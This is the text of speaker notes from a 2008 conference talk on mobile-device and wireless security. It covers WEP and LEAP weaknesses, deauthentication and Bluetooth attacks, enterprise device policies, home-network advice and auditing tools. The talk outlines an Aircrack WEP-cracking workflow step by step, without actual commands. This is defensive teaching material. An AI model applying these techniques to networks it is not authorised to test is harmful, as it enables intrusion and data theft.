PROJECT TAKE MY DEVICE BUT NOT MY DATA DATE AUGUST 12, 2008 CLIENT TASSCC 2008 ANNUAL CONFERENCE
Monday, August 18, 2008 1 Good Morning - I’m glad to be here at TASSCC, to be back in Galveston, and to have the opportunity to speak to you today about mobile devices, and security of the data on these devices that are so predominantly in use in today’s work environment. Goal
To provide an overview about risks associated with the use of mobile devices especially in a wireless world
Monday, August 18, 2008 2 My basic goal with today’s presentation to highlight some of the risks that come with the use of mobile devices , for example just recently CNN ran a story about drive by wireless hacking which some of you may have seen.
The story is just one illustration of how even today, given the fact that wireless networks have been around for awhile there still are it seems plenty of available wireless networks that are not adequately secured or even secured at all Discussion Areas
Physical Security
Mobile Devices
Public Wireless
Enterprise
Monday, August 18, 2008 3 Discussion areas that I will be discussing will include physical security, which perhaps is somewhat overlooked as an important component of technical security in general, but certainly for mobile devices and the security of your data.
Since the title of the presentation includes the words mobile device, I guess we’ll also discuss mobile devices...
Public wireless - personal computer use sure but also with a focus on the use of public wireless with a work computer, The easiest way for someone to be able to take their time trying to read the data on your mobile device is to take it from you permanently. Therefore, road warriors must always keep in mind the physical security aspect of security
Enterprise - policies in the enterprise, authorized mobile devices managed appropriately, are wireless projects properly authorized, and managed in operation Contents Home Networks Tools
Monday, August 18, 2008 4 I’m going to touch on home networks because
Go over some of the tools we use with our audits and security service consulting Threats
Rogue Access Point
Misconfigured Access Point
Client Mis-association
WEP - dinosaur or still breathing?
Monday, August 18, 2008 5 The most common, as well as most dangerous, wireless threat is the rogue access point. The rogue access point is typically a low cost, SOHO-class access point brought in by an employee who desires wireless access. The default access point settings typically have no security enabled, and thus when plugged into the corporate network create an entry-point for anyone with a Wi-Fi client within range
For those enterprises with a wireless LAN infrastructure, one potential threat can arise from their own equipment. An access point which becomes mis-configured can potentially open up a door to the corporate network. In particular, if the access point is reset to network defaults or the security settings are turned off. If the access point is not centrally managed, then the likelihood of it going unnoticed is high. Employees will still be able to connect so no problem will be reported.
Embedded Wi-Fi clients in laptops are now relatively common. Even for those enterpriseswith a "no Wi-Fi" policy, a Windows XP laptop with a wireless client will automatically try to connect to an SSID that it has successfully connected to before. This scenario is very common for two reasons. If the employee has connected to a Linksys, Netgear or other home or hot spot access point using the default SSID, it will automatically connect to another AP with the same SSID without the user being aware of the connection. Secondly, neighboring Wi-Fi networks can spill into the enterprise and curious users connect to these open, insecure, and distrusted networks while still connected on the wired side of the trusted network. Users may also connect to these networks if their internal network firewall does not permit POP email accounts, does not permit access to certain web sites, or they do not want their outbound traffic monitored.
Whats WRONG WITH WEP? As part of the encryption process, WEP prepares a keyschedule ("seed") by concatenating the shared secret key supplied by the user of the sending station with a random-generated 24-bit initialization vector (IV). WEP specifies a shared secret 40 or 64-bit key to encrypt and decrypt the data. Some vendors also include 128 bit keys (know as "WEP2") in their products.
WEP has been part of the 802.11 standard since initial ratification in September 1999. At that time, the 802.11 committee was aware of some WEP limitations; however, WEP was the best choice to ensure efficient implementations worldwide. Nevertheless, WEP has undergone much scrutiny and criticism over the past couple years. WEP is vulnerable because of relatively short IVs and keys that remain static. The issues with WEP don't really have much to do with the RC4 encryption algorithm. With only 24 bits, WEP eventually uses the same IV for different data packets. For a large busy network, this reoccurrence of IVs can happen within an hour or so. This results in the transmission of frames having keystreams that are too similar. If a hacker collects enough frames based on the same IV, the individual can determine the shared values among them, i.e., the keystream or the shared secret key. This of course leads to the hacker decrypting any of the 802.11 frames. Wireless networking Attacks
MAC Address Shared Key Spoofing Attack Authentication Attacks Disassociation and Known Plaintext Deauthentication Attack attacks
Monday, August 18, 2008 6 AP has list of MAC addresses that are allowed to enter the network
Attacker can snif the MAC address and spoof it
Disassociation/Deauthentication Attacks - wifi stations authenticate and then associate, anyone can send disassociate packets, Tools available include Omerta (simply sends disassociation for every data packet), Airjack (includes essid jack which sends a disassociation packet and then listens for association packets to find hidden SSIDs that are not broadcast, FATA_JACK (sends invalid authentication requests spoofing legitimate clients causing the aP to disassociate the client), MONKEY-JACK (deauthenticates a victim and poses as the AP when the victim returns), Void11 (floods authenticate requests to AP causing DoS)
SHARED KEY AUTHENTICATION ATTACKS - authentication challenge is sent in the clear, can use the IV and keystream for false authentication, collect keystreams for man IVs, 24b IV = 24 GB for 1500B packets, all day collection and then look at the data the next day, can store all possible keystreams and then use them to decrypt any messages Known Plaintext Attack
Monday, August 18, 2008 7 Wired attacker sends a message to wireless victim - information on the wired network is unencrypted , so putting the two computers capture the unencrypted and put a computer on the wireless network to capture the encrypted, so you know what the message is because you send the message, then you get the encrypted packet in the air,
AP encrypts the message and transmits over the air
Attacker has both plain text and encrypted text (keystream) - taking the two parts together you get the key stream Wireless Networking Attacks Reaction Attack FMS Attack
Message Modification Dictionary Attack on Attack LEAP
Inductive Attack
Reuse IV Attack
WEP Key Attacks
Monday, August 18, 2008 8 Reaction attack -
ICV is a linear sum => predicable
Change few bits and rebroadcast (TCP acks short packets)
Flip selected bits => figure out whether the Keystream bits are 0 or 1
Message Modification Attack - change the destination address to attacker’s wired node, unencrypted packet will be delivered by the AP to the wired node
Inductive attack - theoritical attack, there is no tool that will do this attack, if you know N bytes of keystream, you can find n+1st byte, send a ping request with 256 variations of the n_1st byte, whichever generates a response is the correct variation. Again, theoritical, but there easier ways to get the keystream.
REUSE IV ATTACK - if you have the keystream for a particular IV, you can keep using the same IV for the keystream you have
WEP KEY ATTACKS - since people can’t remember or it is difcult for them to enter a 40 bit or 104 bit key, the wireless product vendors allow you to enter a passphrase, so the key is generated by a well-known pass phrase algorithm, wep_crack creates a table of keys for all dictionary words and uses them to find the key, dictionary based attack takes a few minutes
FMS ATTACK - Based on a weakness of the way RC4 initializes its matrix, if a key is weak RC4 keystream contains some portions of key more than other combinations, webcrack to snif the network and analyze the output using FMS to crack the key, airsnort snifs and uses a part of FMS to find the key, other tools include dwepdum to capture packets and dwepcrack to find the WEP key
DICTIONARY ATTACK ON LEAP - CISCO’s first attempt to make stronger authentication, LEAP uses MSCHAP v1 for authentication, capture the challenge and response, brute force password attack - use something like john the ripper to break the hash of the password, WPA
Replacement for WEP
Stronger Encryption
Two versus One
Monday, August 18, 2008 9 * WPA-Enterprise, a mechanism for network authentication using IEEE 802.1x and a supported EAP type, one of EAP/TLS, TTLS or PEAP;
Related Content * WPA-Personal, a mechanism for using TKIP without IEEE 802.1x authentication by using a shared passphrase, intended for consumer networks.
In July 2004, the IEEE approved the full IEEE 802.11i specification, which was quickly followed by a new interoperability testing certification from the WiFi Alliance known as WPA2. WPA2 is based on the Robust Security Network (RSN) mechanism, which provided support for all of the mechanisms available in WPA, as well as:
* Strong encryption and authentication support for infrastructure and ad-hoc networks (WPA is limited to infrastructure networks);
* Reduced overhead in key derivation during the wireless LAN authentication exchange;
* Support for opportunistic key caching to reduce the overhead in roaming between access points;
* Support for pre-authentication, where a station completes the IEEE 802.1X authentication exchange before roaming;
* Support for the CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) encryption mechanism based on the Advanced Encryption Standard (AES) cipher as an alternative to the TKIP protocol.
As of March 2006, the WPA2 certification became mandatory for all new equipment certified by the Wi-Fi Alliance, ensuring that any reasonably modern hardware will support both WPA and WPA2.
By leveraging the RC4 cipher (also used in the WEP protocol), the IEEE 802.11i task group was able to improve the security of legacy networks with TKIP while the IEEE 802.11i amendment was completed. It is important to note, however, that TKIP was designed as an interim solution for wireless security, with the goal of providing sufcient security for 5 years while organizations transitioned to the full IEEE 802.11i security mechanism. While there have not been any catastrophic weaknesses reported in the TKIP protocol, organizations should take this design requirement into consideration and plan to transition WPA networks to WPA2 to take advantage of the benefits provided by the RSN architecture. Physical Security
Wireless Access Points
Servers
Monday, August 18, 2008 10 The purpose of physical access controls is the same as that of computer and network access controls-you want to restrict access to those who are authorized to have it
An even more common security feature than locks ( using the term device to describe them is unusual ) is a physical barrier . Physical barriers help implement the physical world equivalent of layered security . The outermost layer of physical security should contain the more public activities . A guard at a gate in a fence , for example , would be visible by all who happen to pass by . As you progress through the layers , the barriers and security mechanisms should become less public to make it more difcult for observers to determine what mechanisms are in place . Signs are also an important element in security , as they announce to the public what areas are public and which are private . In addition to walls and fences , open space can also serve as a barrier . While this may at first seem to be an odd statement , consider the use of large areas of open space . For an intruder to cross this open space takes time-time in which they are vulnerable and their presence maybe discovered . In today ' s environment in which terrorist attacks have become more common , areas that may be considered a possible target for terrorist activity should take additional precautions . In addition to open space , which is necessary to lessen the efect of explosions , concrete barriers that will stop vehicles from getting too close to facilities should also be used . It is not necessary for these to be unsightly concrete walls ; many facilities have placed large , round concrete circles , filled them with dirt , and then planted flowers and other plants to construct a large , immovable , planter Mobile Devices BlackBerry Windows Mobile iPhone
Monday, August 18, 2008 11 Mobile Devices
Cell Phones
Bluejacking
Bluesnarfing
Bluebugging
Monday, August 18, 2008 12 Cell phone, mobile devices with bluetooth capability
Phone numbers, even stored pictures, text messages grabbed long range from unsuspecting victims, some people store notes on their cells with application passwords, or bank account information up for grabs
Bluejacking Bluejacking is the act of anonymously sending a message to a user of a Bluetooth wireless technology enabled device who has turned on Bluetooth technology and made their device visible (also referred to as discoverable) to other devices. Attackers can target individuals or broadcast anonymous messages to all discoverable devices in the area. Because Bluetooth wireless technology enabled phones, PDAs, and laptops can search for other devices within a short range, attackers in crowded public areas can easily send anonymous messages without detection. Bluejacking is a user-based risk.
Bluesnarfing Bluesnarfing occurs when attackers use Bluetooth technology to connect to a target device without notifying the user and access target device information without knowledge or consent. Typically, the attacker accesses the user’s contact list, although all object exchange (OBEX)-addressable data that is stored on the device is vulnerable. Revealing sensitive information is the most obvious consequence of this type of attack, but there are other consequences, including sending an SMS message, initiating a phone call, or creating a false phone book entry. BlackBerry devices should not be vulnerable to bluesnarfing attacks because the OBEX functionality is not implemented on BlackBerry devices. The Bluetooth interface that is implemented by RIM is only plugged into the phone application (for voice usage), which should prevent attackers from accessing core BlackBerry device data. Bluesnarfing is a device-based risk that occurs because of an incorrect implementation of the specification for Bluetooth wireless technology by device manufacturers.
Bluebugging Bluebugging involves accessing mobile phone commands using Bluetooth wireless technology without notifying or alerting the user of the target device. This vulnerability enables the attacker to initiate phone calls, send and read SMS messages, access and enter phonebook contacts, eavesdrop on phone conversations, and connect to the Internet all without detection or authorization. Bluebugging is a device-based risk that occurs because of poor implementation of Bluetooth security mechanisms by device manufacturers. MOBILE DEVICES
Monday, August 18, 2008 13 Discuss WSJ article
Spyware is used by hackers to monitor what you type or messages that you receive, those phones with built in GPS could allow these hackers to monitor your location,
Many point to FlexiSPY, a program sold by Thai software company Vervata Co. The company promotes the product as a way for husbands and wives to catch their cheating spouses. Once installed on a person's phone, FlexiSPY tracks the device's whereabouts and monitors incoming and outgoing calls, text messages and emails. The information is then uploaded to a central server and can be viewed by the person who originally installed the software.
BlackBerrys may also be vulnerable to attack. In 2006, a security expert developed a program called BB Proxy to highlight the risks the gadgets face from spyware. The program can be delivered wirelessly or installed when a user downloads an unprotected program. Onceor installed when a user downloads an unprotected program. Once inside, it can access a company's internal network and snoop on private information. BlackBerry manufacturer Research In Motion Ltd. says that security policies built into the BlackBerry Enterprise Server software, which helps coordinate corporate email systems with users' BlackBerrys, can guard against such spyware. Many small businesses, however, can't afford the BlackBerry server. Even Apple Inc.'s iPhone, with its lauded security upgrades, may be vulnerable, says Dan Hoffman, chief technology officer of security- software maker SMobile Systems Inc. While the iPhone offers password protection, it lacks other capabilities such as data encryption, Mr. Hoffman says. Most hackers can easily break through the password protection. "That's a pretty big deal," he says. In addition, the iPhone's Safari browser could be susceptible to attacks if it stumbles upon the wrong Web site. A group of ethical hackers called "White Hats," who simulate attacks to raise awareness, built a Web site that successfully delivered malicious software to an iPhone. The iPhone's ability to tap into Wi-Fi networks is another risk, because the Internet access isn't as secure as a tightly controlled BlackBerry
Confidentiality
Wireless IT commands
Monday, August 18, 2008 14 Confidentiality A message is considered confidential if only the intended recipient can view the contents of a message. Confidentiality is typically achieved using encryption, which is key-based scrambling of data. An encryption algorithm is designed so that only the parties that know the secret key can decrypt the encrypted data or cipher text. The BlackBerry Enterprise Solution uses a symmetric key encryption algorithm, which is designed to provide strong security and complete confidentiality of sensitive user information. BlackBerry devices are designed to compress the message before encrypting it using a key that is unique to that device. The key is not used in the compression. When receiving a message from the BlackBerry device, the BlackBerry Enterprise Server™ is designed to decompress and decrypt the message using the device’s unique key. The BlackBerry Enterprise Server and the BlackBerry device should be the only parties that know the value of the master encryption key.
Wireless IT commands System administrators can control BlackBerry devices remotely using wireless IT commands. These commands are most commonly used on lost or stolen BlackBerry devices. The following wireless IT commands are available to system administrators: • Kill Handheld: This command is designed to erase all user and application data that is stored on the BlackBerry device. If a BlackBerry device has been stolen or cannot be found, the system administrator can erase all information and application data remotely. • Set a Password and Lock the Handheld: This command is designed to enable the system administrator to create a new password and lock the BlackBerry device remotely. If the user is uncertain of the BlackBerry device location, the system administrator can set a password (if one has not been set) and lock the device. The system administrator can then verbally communicate the new password to the user when the device is found. The user is prompted on the device to accept or reject the new password change. • Reset the Password and Lock the Handheld: If the user has forgotten the BlackBerry device password, this command enables a system administrator to reset the password remotely and communicate the new password to the user. BlackBerry
Confidentiality
Wireless IT commands
Monday, August 18, 2008 15
Note: If content protection is enabled, the administrator will not be able to reset the user’s password remotely. Wireless IT commands enable system administrators to immediately respond to a lost or stolen BlackBerry device and protect confidential enterprise information.
Using the BlackBerry Enterprise Server, system administrators can set specific IT policies to define how users use the security settings that are included on BlackBerry devices and in the BlackBerry Desktop Manager. • IT policies for security: The BlackBerry Enterprise Solution ofers users many diferent security settings for the BlackBerry device and BlackBerry Desktop Manager. All BlackBerry user security settings can be defined by system administrators. For example, system administrators specify whether a password is required, the length of time that a password can exist before it becomes invalid, and the length and composition of a password. Encryption key details can also be specified using an IT policy. Public Wireless
Rogue Access Point
Ad Hoc Networking
Monday, August 18, 2008 16 Airsnarf used to setup a rogue access point and present an authentication web page to the user can be used to steal credit card numbers
AD HOC NETWORKING - computer to computer networking is allowed in XP, viruses and worms can be passed on if one of them is infected and the other does not have a client firewall Enterprise
IT Policies
Security Policy
Monday, August 18, 2008 17 Security Policy – Determine if the organization has a defined policy for the use of handheld devices. This policy should cover: • Information that is to be placed on the device • Security configuration of the device including all software that is to be used to protect the information • Modes of operation, including whether wireless radio frequency and/or infrared transmission is permitted. • Whether the user is permitted System Administrator rights to the company or government entity base PC with which the device synchronizes. • Device added to the registry • Employee has read and understood the Use Policy and the Security Policy associated with handheld devices • Employee has received awareness training regarding the security of the handheld • The device has been properly configured regarding security • All necessary security software has been loaded on the device
6. Employee Termination Procedure – Determine if the return of handheld devices is included in the organization’s employee termination procedures. 7. Device Authentication – Determine if the device authentication meets the organization’s authentication policy. All devices should require authentication at power up and at regular intervals while active. The authentication mechanism should be one of the following: • A strong password (preferably eight characters and a mixture of letters, numbers, and special characters) • A smart card in conjunction with a PIN or password • Biometrics (such as a fingerprint) in conjunction with a PIN or password Note: authentication by handwriting is not recommended.
Enterprise
IT Policies
Use Policy
Monday, August 18, 2008 18 2. Use Policy – Determine if the organization has included handheld devices in its acceptable use policy. This policy should cover: • Prospective personally owned PDA users will sign an agreement defining permitted use policy. • A PDA may not be used to enter or store passwords, safe/door combinations, personal identification numbers, or classified, sensitive or proprietary information. • No upload/download via wireless or infrared, while connected to a desktop PC, particularly a networked PC. • Use infrared only for authorized data transfers. • PDAs will not be left unattended when attached to a computer. • PDAs will be secured with password protection when not in use. • Device should be used for work related activities • Device ownership is established (this will depend on the policy of the organization with regard to employee-owned devices) • Allowed network connectivity will be identified • Only approved software will be loaded on the device • The user must take responsible steps to prevent the loss or theft of the device • The user must regularly sync the device with its home PC or the network so that appropriate security files (such as virus signatures and policy files) may be updated
Page 3 of 6 Awareness Training – Determine if the organization includes information about the security of handheld devices in its security awareness training. This training should cover: • Physical security of the device • The handheld security policy • Information that may be stored on the device • The procedure to follow if a device is lost or stolen 4. Device Registration – The organization should maintain a registry of all devices in use. This registry should include: • Serial number of the device Enterprise
IT Policies
Security Policy
Use Policy
Awareness Training
Monday, August 18, 2008 19 Page 3 of 6 Awareness Training – Determine if the organization includes information about the security of handheld devices in its security awareness training. This training should cover: • Physical security of the device • The handheld security policy • Information that may be stored on the device • The procedure to follow if a device is lost or stolen 4. Device Registration – The organization should maintain a registry of all devices in use. This registry should include: • Serial number of the device No Control • Make and model of the device • Employee to whom the device has been issued Each device that is owned by the organization should be marked as such with an asset tag or other permanent marking. nitial Checklist – Prior to the device being issued to an employee, the organization should follow a checklist to make sure that the device is registered properly and that the employee has received a device that is properly configured. Items on the checklist should include: • Device added to the registry • Employee has read and understood the Use Policy and the Security Policy associated with handheld devices • Employee has received awareness training regarding the security of the handheld • The device has been properly configured regarding security • All necessary security software has been loaded on the Enterprise
IT Policies Employee Termination Security Policy Procedure
Use Policy Device Authentication Awareness Training AV software Initial Checklist
Monday, August 18, 2008 20 nitial Checklist – Prior to the device being issued to an employee, the organization should follow a checklist to make sure that the device is registered properly and that the employee has received a device that is properly configured. Items on the checklist should include: • Device added to the registry • Employee has read and understood the Use Policy and the Security Policy associated with handheld devices • Employee has received awareness training regarding the security of the handheld • The device has been properly configured regarding security • All necessary security software has been loaded on the device 6. Employee Termination Procedure – Determine if the return of handheld devices is included in the organization’s employee termination procedures. 7. Device Authentication – Determine if the device authentication meets the organization’sauthentication policy. All devices should require authentication at power up and at regular intervals while active. The authentication mechanism should be one of the following: • A strong password (preferably eight characters and a mixture of letters, numbers, and special characters)
Software to enhance device authentication is available from Bluefire Security, Credant, and PDA Defense 8. Anti-Virus Software – Determine if AV software is loaded on each handheld device. This software should be configured to examine files as they are opened. Updated signatures should be installed on the device every time the device syncs to its home PC or at regular intervals via a network connection. Enterprise
VPN software
Device integrity
Device Management
Network connections
Server maintenance
Monday, August 18, 2008 21 Virtual Private Network Software – Determine if VPN software is used when the device connects to the organization over the Internet. The VPN software should use IPSec or SSL and be tied into a strong authentication mechanism.
VPN software is available from Funk Software, NetMotion, Checkpoint, and Certicom. 13. Device Integrity – Determine if the device has a mechanism to detect modifications to key system files or registry settings. The device should alarm if the key files or settings are modified and prevent damage from the device to spread into the organization.
Integrity software is available from Bluefire Security. 14. Device Management – Determine if there is a central management capability in the organization. Since these devices are not completely under the control of the organization and are by nature mobile, the organization should have a mechanism to manage the security policy of the device from a central location. 15. Network Connections – Determine if all device network connections are either disabled or protected. The network connections to verify include: • Bluetooth • Infrared • 802.11 • CDMA • GPRS
Server maintenance - patches, updates Home Networks
SSID
MAC filtering
Monday, August 18, 2008 22 Your home computer is a popular target for intruders. Why? Because intruders want what you’ve stored there. They look for credit card numbers, bank account information, and anything else they can find. By stealing that information, intruders can use your money to buy themselves goods and services.
But it’s not just money-related information they’re after. Intruders also want your computer’s resources, meaning your hard disk space, your fast processor, and your Internet connection. They use these resources to attack other computers on the Internet. In fact, the more computers an intruder uses, the harder it is for law enforcement to fi gure out where the attack is really coming from. If intruders can’t be found, they can’t be stopped, and they can’t be prosecuted.
SSID hiding: There is no such thing as "SSID hiding". You're only hiding SSID beaconing on the Access Point. There are 4 other mechanisms that also broadcast the SSID over the 2.4 or 5 GHz spectrum. The 4 mechanisms are; probe requests, probe responses, association requests, and re-association requests. Essentially, youre talking about hiding 1 of 5 SSID broadcast mechanisms. Nothing is hidden and all youve achieved is cause problems for Wi-Fi roaming when a client jumps from AP to AP. Hidden SSIDs also makes wireless LANs less user friendly. You dont need to take my word for it. Just ask Robert Moskowitz who is the Senior Technical Director of ICSA Labs in his white paper Debunking the myth of SSID hiding.
MAC filtering: This is like handing a security guard a pad of paper with a list of names. Then when someone comes up to the door and wants entry, the security guard looks at the person's name tag and compares it to his list of names and determines whether to open the door or not. Do you see a problem here? All someone needs to do is watch an authorized person go in and forge a name tag with that person's name. The comparison to a wireless LAN here is that the name tag is the MAC address. The MAC address is just a 12 digit long HEX number that can be viewed in clear text with a sniffer. A sniffer to a hacker is like a hammer to a carpenter except the sniffer is free. Once the MAC address is seen in the clear, it takes about 10 seconds to cut-paste a legitimate MAC address in to the wireless Ethernet adapter settings and the whole scheme is defeated. MAC filtering is absolutely worthless since it is one of the easiest schemes to attack. The shocking thing is that so many large organizations still waste the time to implement these things. The bottom line is, MAC filtering takes the most effort to manage with zero ROI (return on investment) in terms of security gain Home Networks
Disable DHCP
Antenna Placement
Monday, August 18, 2008 23
Disable DHCP: This is much more of waste of time than it is a security break. DHCP allows the automatic assignment of IP addresses and other configurations. Disabling DHCP has zero security value and just wastes time. It would take a hacker about 10 seconds to figure out the IP scheme of any network and simply assign their own IP address. Anyone who tells you that this is a way to secure your wireless LAN doesn't know what they're talking about
Antenna placement: I've heard the craziest thing from so called security experts that actually tell people to only put their Access Points in the center of their building and put them at minimal power. Antenna placement does nothing to deter hackers. Remember, the hacker will always have a bigger antenna than you which can home in on you from a mile away. Making a wireless LAN so weak only serves to make the wireless LAN useless. Antenna placement and power output should be designed for maximum coverage and minimum interference. It should never be used as a security mechanism Home Networks Best Practices
Monday, August 18, 2008 24 you ‘ve heard it all before but its worth repeating
Email-borne viruses and worms operate much the same way, except there are consequences, sometimes signifi cant ones. Malicious email often contains a return address of someone we know and often has a provocative Subject line. This is social engineering at its fi nest – something we want to read from someone we know. Email viruses and worms are fairly common. If you’ve not received one, chances are you will. Here are steps you can use to help you decide what to do with every email message with an attachment that you receive. You should only read a message that passes all of these tests. 1. The Know test: Is the email from someone that you know? 2. The Received test: Have you received email from this sender before? 3. The Expect test: Were you expecting email with an attachment from this sender? 4. The Sense test: Does email from the sender with the contents as described in the Subject line and the name of the attachment(s) make sense? For example, would you expect the sender – let’s say your Mother – to send you an email message with the Subject line “Here you have, ;o)” that contains a message with attachment – let’s say AnnaKournikova.jpg.vbs? A message like that probably doesn’t make sense. In fact, it happens to be an instance of the Anna Kournikova worm, and reading it can damage your system. Home Networks Best Practices
Monday, August 18, 2008 25 5. The Virus test: Does this email contain a virus? To determine this, you need to install and use an anti-virus program. That task is described in the section entitled Install and Use Anti- Virus Programs. You should apply these fi ve tests – KRESV – to every piece of email with an attachment that you receive. If any test fails, toss that email. If they all pass, then you still need to exercise care and watch for unexpected results as you read it.
1. The Strong test: Is the password as strong (meaning length and content) as the rules allow? 2. The Unique test: Is the password unique and unrelated to any of your other passwords? 3. The Practical test: Can you remember it without having to write it down? 4. The Recent test: Have you changed it recently? In spite of the SUPR tests, you need to be aware that sniffi ng happens, and even the best of passwords can be captured and used by an intruder. You should use passwords not only on your home computer but also for services you use elsewhere on the Internet. All should have the strongest passwords you can use and remember, and each password should be unique and unrelated to all other passwords. A strong password is a password that is longer than it is short, that uses combinations of uppercase and lowercase letters, numbers, and punctuation, and that is usually not a word found in a dictionary. Home Networks Best Practices
Monday, August 18, 2008 26 So then, how do you decide if a program is worth it? To decide if you should install and run a program on your home computer, follow these steps:
1. The Do test: What does the program do? You should be able to read a clear description of what the program does. This description could be on the web site where you can download it or on the CD-ROM you use to install it. You need to realize that if the program was written with malicious intent, the author/ intruder isn’t going to tell you that the program will harm your system. They will probably try to mislead you. So, learn what you can, but consider the source and consider whether you can trust that information. 2. The Changes test: What fi les are installed and what other changes are made on your system when you install and run the program? Again, to do this test, you may have to ask the author/ intruder how their program changes your system. Consider the source. 3. The Author test: Who is the author? (Can you use email, telephone, letter, or some other means to contact them?) Once you get this information, use it to try to contact them to verify that the contact information works. Your interactions with them may give you more clues about the program and its potential efects on your computer and you. Home Networks Best Practices
Monday, August 18, 2008 27 4. The Learn test: Has anybody else used this program, and what can you learn from him or her? Try some Internet searches using your web browser. Somebody has probably used this program before you, so learn what you can before you install it. If you can’t determine these things – the DCAL tests for short – about the program you’d like to install, then strongly consider whether it’s worth the risk. Only you can decide what’s best. Whatever you do, be prepared to rebuild your computer from scratch in case the program goes awry and destroys it. Public Internet Computers
Firewall
HD Encryption
Turn off wireless
Erase your tracks
Monday, August 18, 2008 28 Windows Vista or Windows XP SP2 has firewall turned on by default
Encrypt your data with Windows XP Professional.
Your data should be encrypted on your hard drive to no only protect against unauthorized access to your mobile drive, but also should the mobile device be lost.
Always log out of web sites by clicking "log out" on the site.
It's not enough to simply close the browser window or type in another address.
Many programs include automatic login features that will save your user name and password. Disable this option so no one can log in as you.
Disable web browser features that store passwords. Tools
Kismet
Airshark
Bluetooth Dongle
Yagi Antenna
Monday, August 18, 2008 29 Open source tools KISMET linux based wardriving tool, reads out names of networks as they are discovered (which is nice as an eye free feature for the drivers), can dump printable strings which may include passwords, get list of networks in a CSV file, dump of packets for WEP key finding
Airshark Netstumbler Bluetooth - can be snifed from afar, Yagi is not just for wifi cards
Wi-Fi Discovery Tools Aerosol Airsnort AP Radar Boingo Software DStumbler KisMAC iStumbler MacStumbler MiniStumbler NetChaser NetStumbler PCTEL Roaming Client PrismStumbler T-Mobile Connection Manager WaveStumbler Wellenreiter WiFiFoFum WiStumbler
Wi-Fi Raw Packet Capture Tools -AirPcap ettercap libpcap Prism2Dump tcpdump
Wi-Fi Trafc Analyzers AirDefense Mobile AirMagnet Laptop and Handheld Analyzers BVS YellowJacket BSD-AirTools Aruba Networks RFprotect Mobile Cambridge vxSnifer Fluke Networks OptiView and EtherScope Javvin Network Packet Analyzer Kismet Mognet Network Chemistry Packetyzer Network General Snifer Portable/Mobile Network Instruments Network Observer TamoSoft CommView for Wi-Fi WildPackets OmniPeek Tools
GPS
Bluetooth Dongle
Yagi Antenna
Monday, August 18, 2008 30 Tools
GPS
Bluetooth Dongle
Yagi Antenna
Monday, August 18, 2008 31 Tools
GPS
Bluetooth Dongle
Yagi Antenna
Monday, August 18, 2008 32 LINUX - UBUNTU
DEDICATED LAPTOPS
TOOLS
Monday, August 18, 2008 33 Tools - Sample Screens
Aircrack
Monday, August 18, 2008 34 Aircrack—Step 1 (Enable adapter into monitor mode using airmon-ng) Tools - Sample Screens
Aircrack
Monday, August 18, 2008 35
Aircrack—Step 2 (Packet Capture with airodump, when you are using the aircrack suite, this is the “main” screen you watch) Tools - Sample Screens
Aircrack
Monday, August 18, 2008 36
Aircrack—Step 3 (Packet replay attack using injection with aireplay-ng, designed to speed up the data capture process) Tools - Sample Screens
Aircrack
Monday, August 18, 2008 37 Aircrack—Step 4 (Packet replay attack using injection with aireplay-ng, this is what it looks like when the packets get rolling) Tools - Sample Screens
Aircrack
Monday, August 18, 2008 38 Aircrack—Step 5 (Cracking the Key) Monday, August 18, 2008 39 INTERNAL SCAN
TOOLS IBM INTERNET SCANNER
Monday, August 18, 2008 40 For external and internal scans Guest Accounts
TOOLS IBM INTERNET SCANNER
Monday, August 18, 2008 41 Oops
TOOLS IBM INTERNET SCANNER
Monday, August 18, 2008 42 THANK YOU.
Monday, August 18, 2008 43